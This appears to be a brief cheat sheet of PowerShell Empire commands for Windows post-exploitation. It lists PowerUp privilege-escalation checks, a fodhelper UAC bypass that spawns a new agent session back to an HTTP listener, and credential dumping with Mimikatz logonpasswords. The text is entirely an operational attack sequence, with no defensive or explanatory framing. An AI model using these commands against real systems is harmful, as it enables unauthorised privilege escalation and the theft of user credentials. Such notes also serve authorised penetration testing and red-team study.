- usemodule powershell/privesc/powerup/allchecks to check all privesc exploits
- execute
- suppose it show uacbypass then
usemodule privesc/bypassuac_fodhelper
info
set Listener http
execute
new session will be created
interact <agents-id>
- usemodule credentials/ to check cred modules
usemodule credentials/mimikatz/logonpasswords
execute
sekurlsa::logonpasswords
- this cred will be saved in creds . move to active session
creds